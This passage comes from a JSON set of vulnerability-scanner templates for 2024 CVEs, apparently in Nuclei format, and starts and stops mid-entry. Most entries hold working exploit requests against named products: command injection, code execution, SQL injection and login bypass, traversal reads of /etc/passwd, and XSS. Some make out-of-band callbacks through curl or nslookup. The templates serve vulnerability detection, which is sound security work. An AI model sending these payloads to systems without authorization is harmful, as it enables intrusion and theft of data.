Missing Authentication","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/devices"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"account\":","\"passwd\":","status\":\"success"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7029","info":{"name":"AVTECH IP Camera - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=white_led&brightness=$(echo%20{{string}}+2>&1)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{string}}"]},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-38472","info":{"name":"Apache HTTPd Windows UNC - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5C{{interactsh-url}}/apachehttpd"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"interactsh_request","words":["/apachehttpd"]}]}]},{"id":"CVE-2024-7120","info":{"name":"Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - Command Injection","severity":"medium"},"requests":[{"raw":["GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{randstr}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60  HTTP/1.1\nHost: {{Hostname}}\n","GET /tmp/info.html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-25600","info":{"name":"Unauthenticated Remote Code Execution \u2013 Bricks <= 1.9.6","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-json/bricks/v1/render_element HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"postId\": \"1\",\n  \"nonce\": \"{{nonce}}\",\n  \"element\": {\n    \"name\": \"container\",\n    \"settings\": {\n      \"hasLoop\": \"true\",\n      \"query\": {\n        \"useQueryEditor\": true,\n        \"queryEditor\": \"ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);\",\n        \"objectType\": \"post\"\n      }\n    }\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["Exception:","uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true}]}]},{"id":"CVE-2024-32739","info":{"name":"CyberPower < v2.8.3 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":\"finished\"","\"results\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"code\":\"([0-9.]+)\""]}]}]},{"id":"CVE-2024-39907","info":{"name":"1Panel SQL Injection - Authenticated","severity":"critical"},"requests":[{"raw":["POST /api/v1/auth/login HTTP/1.1\nHost: {{Hostname}}\nEntranceCode: ZW50cmFuY2U=\nContent-Type: application/json\n\n{\"name\":\"{{username}}\",\"password\":\"{{password}}\",\"ignoreCaptcha\":true,\"authMethod\":\"session\",\"language\":\"en\"}\n","POST /api/v1/hosts/command/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"page\":1,\"pageSize\":10,\"groupID\":0,\"orderBy\":\"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;\",\"order\":\"ascending\",\"name\":\"a\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"SQL logic error\",\"table exp already exists\")","contains(header_1, 'psession')"],"condition":"and"}]}]},{"id":"CVE-2024-5910","info":{"name":"Palo Alto Expedition - Admin Account Takeover","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/OS/startup/restore/restoreAdmin.php"],"matchers-condition":"and","matchers":[{"type":"word","words":["Admin user found","Admin password restored"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6159","info":{"name":"Push Notification for Post and BuddyPress <= 1.93 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/push-notification-for-post-and-buddypress\")"],"internal":true}]},{"raw":["@timeout 50s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=icpushcallback&onesignal_externalid=1+AND+SLEEP(6)&pushtype=onesignal_subscribed_users\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-27956","info":{"name":"WordPress Automatic Plugin <= 3.92.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nq=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2fae\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(header, \"application/csv\")","contains_all(body, \"DATE\", \"ACTION\", \"KEYWORD\")"],"condition":"and"}]}]},{"id":"CVE-2024-46986","info":{"name":"Camaleon CMS < 2.8.1 Arbitrary File Write to RCE","severity":"critical"},"requests":[{"raw":["GET /admin/login HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","internal":true,"name":"nonce","group":1,"regex":["name=\"authenticity_token\" value=\"(.*?)\""]}]},{"raw":["POST /admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\nauthenticity_token={{nonce}}&user%5Busername%5D={{username}}&user%5Bpassword%5D={{password}}\n"],"matchers":[{"type":"dsl","dsl":["contains(location,\"/admin/dashboard\")"],"internal":true}]},{"raw":["POST /admin/media/upload?actions=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8\n\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"{{filename}}.rb\"\nContent-Type: text/x-ruby-script\n\n`curl {{interactsh-url}}`\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"folder\"\n\n../../../config/initializers/\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"skip_auto_crop\"\n\ntrue\n------WebKitFormBoundarynJs8ffRP2MgQXiF8--\n"],"matchers":[{"type":"word","part":"body","words":["{\"name\":\"{{filename}}.rb\",\"folder_path\":\"../../../config/initializers\""],"internal":true}]},{"raw":["POST /admin/media/upload?actions=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8\n\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"restart.txt\"\nContent-Type: text/x-ruby-script\n\n{{randstr}}\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"folder\"\n\n../../../tmp/\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"skip_auto_crop\"\n\ntrue\n------WebKitFormBoundarynJs8ffRP2MgQXiF8--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"name\":\"restart.txt\",\"folder_path\":\"../../../tmp\""]}]}]},{"id":"CVE-2024-1728","info":{"name":"Gradio > 4.19.1 UploadButton - Path Traversal","severity":"high"},"requests":[{"raw":["POST /queue/join HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"data\":[{\"path\":\"{{path}}\",\"url\":\"{{BaseURL}}/file=/help\",\"orig_name\":\"CHANGELOG.md\",\"size\":3549,\"mime_type\":\"text/markdown\"}],\"event_data\":null,\"fn_index\":0,\"trigger_id\":2,\"session_hash\":\"{{randstr}}\"}\n","GET /queue/data?session_hash={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n","GET /file={{extracted_path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"extracted_path","regex":["/tmp/gradio/[^/]+/passwd","C:.*\\win\\.ini"],"internal":true}],"payloads":{"path":["/etc/passwd","/windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[^:]:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6517","info":{"name":"Contact Form 7 Math Captcha <= 2.0.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/ds-cf7-math-captcha\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=dscf7_refreshcaptcha&tagname=\"<script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"<script>alert(document.domain)</script>"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4348","info":{"name":"osCommerce v4.0 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1","{{BaseURL}}/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<ScRiPt>alert('document_domain')</ScRiPt>","Listing of all products on the site"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5315","info":{"name":"Dolibarr ERP CMS `list.php` - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /htdocs/index.php?mainmenu=home HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginfunction=loginfunction&username={{username}}&password={{password}}\n","GET /htdocs/commande/list.php?viewstatut=x%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header_1","words":["Set-Cookie: DOLSESSID_"]},{"type":"word","part":"body_1","words":["SuperAdmin"]}]}]},{"id":"CVE-2024-36527","info":{"name":"Puppeteer Renderer  - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html?url=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33610","info":{"name":"Sharp Multifunction Printers - Cookie Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sessionlist.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No.","User","From","Last login","Last access","Language ID","Cookie"],"condition":"and"},{"type":"word","part":"header","words":["Set-Cookie: MFPSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28987","info":{"name":"SolarWinds Web Help Desk - Hardcoded Credential","severity":"critical"},"requests":[{"raw":["GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username+':'+password)}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["displayClient","shortDetail"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33605","info":{"name":"Sharp Multifunction Printers - Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/installed_emanual_list.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ServiceEmanualList","/installed_emanual_down.html"],"condition":"and"},{"type":"word","part":"header","words":["Set-Cookie: MFPSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31621","info":{"name":"Flowise 1.6.5 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/API/V1/credentials"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"credentialName\":","\"updatedDate\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7354","info":{"name":"Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["/wp-content/plugins/ninja-forms"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-submissions&\"><script>alert(document.domain)</script>=2 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27718","info":{"name":"Smart s200 Management Platform v.S200 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /importexport.php?sql={{base64(cmd)}}&type=exportexcelbysql HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1561","info":{"name":"Gradio 4.3-4.12 - Local File Read","severity":"high"},"requests":[{"raw":["POST /component_server HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"component_id\": \"1\", \"data\": \"{{path}}\", \"fn_name\": \"move_resource_to_block_cache\", \"session_hash\": \"aaaaaaaaaaa\"}\n","GET /file={{download_path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","name":"download_path","internal":true,"group":1,"regex":["\"?([^\"]+)"]}],"payloads":{"path":["c:\\\\windows\\\\win.ini","/etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-23692","info":{"name":"Rejetto HTTP File Server - Template injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["rejetto"]}]}]},{"id":"CVE-2024-8883","info":{"name":"Keycloak - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /realms/master/protocol/openid-connect/auth?client_id={{client_id}}&redirect_uri={{redir_host}}:80@{{redirect_uri}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"redir_host":["http://localhost","http://127.0.0.1","https://localhost","https://127.0.0.1","http://[::]","https://[::]"],"client_id":["security-admin-console","master-realm","broker","admin-cli","account","account-console"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["Location:\\s+https?://(localhost|127.0.0.1|\\[::\\]):\\d*@oast\\.me\\?"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2024-21650","info":{"name":"XWiki < 4.10.20 - Remote code execution","severity":"critical"},"requests":[{"raw":["GET {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparent=xwiki%3AMain.UserDirectory&register_first_name={{firstname}}&register_last_name={{lastname}}&xwikiname={{user}}&register_password={{pass}}&register2_password={{pass}}&register_email=\"{{randstr}}%40{{rand_base(5)}}.com&xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender&form_token={{token}}\n"],"payloads":{"path":[null,"/xwiki"]},"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration successful","Attack succeeded","Failed to execute the [groovy]"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["data\\-xwiki\\-form\\-token=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2024-29272","info":{"name":"VvvebJs < 1.7.5 - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfile=demo/landing/index.php&html={{md5(num)}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"File saved\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /demo/landing/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6396","info":{"name":"Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite","severity":"critical"},"requests":[{"raw":["POST /tracking/client_1/get-resource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"resource_handler\": \"my_resource\",\n\"resource_type\": \"Repo\",\n\"args\": \"AAAAAAABAAAABw==\"\n}\n","POST /tracking/client_1/read-instruction HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"resource_handler\": \"my_resource\",\n\"method_name\": \"_backup_run\",\n\"args\": \"{{base64(args)}}\"\n}\n","@Host: http://{{Host}}:43800\nGET /static-files/{{filename}}.txt HTTP/1.1\nHost: {{Host}}:43800\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"handler\":\"my_resource\"}"]},{"type":"word","part":"body_3","words":["{{filename}}.txt"]},{"type":"word","part":"header_3","words":["text/plain"]}]}]},{"id":"CVE-2024-3753","info":{"name":"Hostel < 1.1.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["/wp-content/plugins/hostel"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wphostel_bookings&do=edit&id=&type=upcoming&offset=\"><script>alert(document.domain)<%2Fscript>&type=\"><script>alert(document.domain)<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-45622","info":{"name":"ASIS - SQL Injection Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /asispanel/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"<title>ASIS | Aplikasi Sistem Sekolah </title>\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /asispanel/login/cek HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%27+or+0%3D0+%23%23&password={{pass}}&submit=&submit=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 303"],"condition":"and","internal":true}]},{"raw":["GET /asispanel/home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"Logout\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-1512","info":{"name":"MasterStudy LMS WordPress Plugin <= 3.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(body,\"items\",\"total\",\"total_price\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-9617","info":{"name":"Danswer - Insecure Direct Object Reference","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/chat/get-chat-session/1?is_shared=True"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"chat_session_id\", \"description\", \"persona_id\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4940","info":{"name":"Gradio - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /file=http://oast.pro/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"},{"type":"status","status":[302]}]}]},{"id":"CVE-2024-4295","info":{"name":"Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via Hash","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /?es=optin&hash={{ base64(rawhash) }} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5","contains(body, \"You have been successfully subscribed\")"],"condition":"and"}]}]},{"id":"CVE-2024-27954","info":{"name":"WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"link\":\"file:"]},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2024-34061","info":{"name":"Changedetection.io <=v0.45.21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-base_url=&application-notification_urls=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-fetch_backend=html_requests&application-webdriver_delay=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&save_button=Save\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","is not a valid AppRise URL"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" value=\"([^\"]+)\""],"internal":true}]}]},{"id":"CVE-2024-3097","info":{"name":"NextGEN Gallery <= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ngg/v1/admin/block/image/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":","\"image\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4040","info":{"name":"CrushFTP VFS - Sandbox Escape LFR","severity":"critical"},"requests":[{"id":"unauth-exploit","raw":["GET /WebInterface/ HTTP/1.1\nHost: {{Hostname}}\n","POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["root:x:"]},{"type":"word","part":"header","words":["text/xml"]}],"extractors":[{"type":"regex","name":"auth","internal":true,"part":"header_1","group":1,"regex":["currentAuth=([0-9a-zA-Z]+)"]}]},{"id":"login","raw":["GET /WebInterface/ HTTP/1.1\nHost: {{Hostname}}\n","POST /WebInterface/function/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 111\nOrigin: {{RootURL}}\nReferer: http://{{RootURL}}/WebInterface/login.html\n\ncommand=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","internal":true,"words":["<response>success</response>"]},{"type":"word","part":"header_2","internal":true,"words":["text/xml"]}],"extractors":[{"type":"regex","name":"auth","internal":true,"part":"header_2","group":1,"regex":["currentAuth=([0-9a-zA-Z]+)"]}]},{"id":"auth-exploit","raw":["POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["root:x:"]}]}]},{"id":"CVE-2024-7188","info":{"name":"Bylancer Quicklancer 2.4 G - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 30s\nGET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1)%20AND%20(SELECT%201864%20FROM%20(SELECT(SLEEP(6)))gOGh)%20AND%20(6900=6900&salary-type=1&sort=id&subcat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type,\"text/html\")","contains_all(body,\"og:site_name\",\"og:locale\",\"range2\")"],"condition":"and"}]}]},{"id":"CVE-2024-23167","info":{"name":"GestSup - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /ajax/calendar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=add_event&title=<img/src/onerror=alert(document.domain)>&start={{formatted_date}} 07:30:00&end={{formatted_date}} 23:00:00&allday=false&technician=1\n"],"matchers":[{"type":"word","part":"response","words":["{\"event_id\":\"","text/html"],"condition":"and","internal":true}]},{"raw":["POST /index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&pass={{password}}&submit=submit\n","GET /index.php?page=calendar HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view=activity","?page=calendar","<img/src/onerror=alert(document.domain)>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2024-9014","info":{"name":"pgAdmin 4 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /login?next=/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","negative":true,"regex":["OAUTH2_CLIENT_SECRET\": null"]},{"type":"word","part":"body","words":["<title>pgAdmin 4</title>","OAUTH2_CLIENT_SECRET"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3273","info":{"name":"D-Link Network Attached Storage - Command Injection and Backdoor 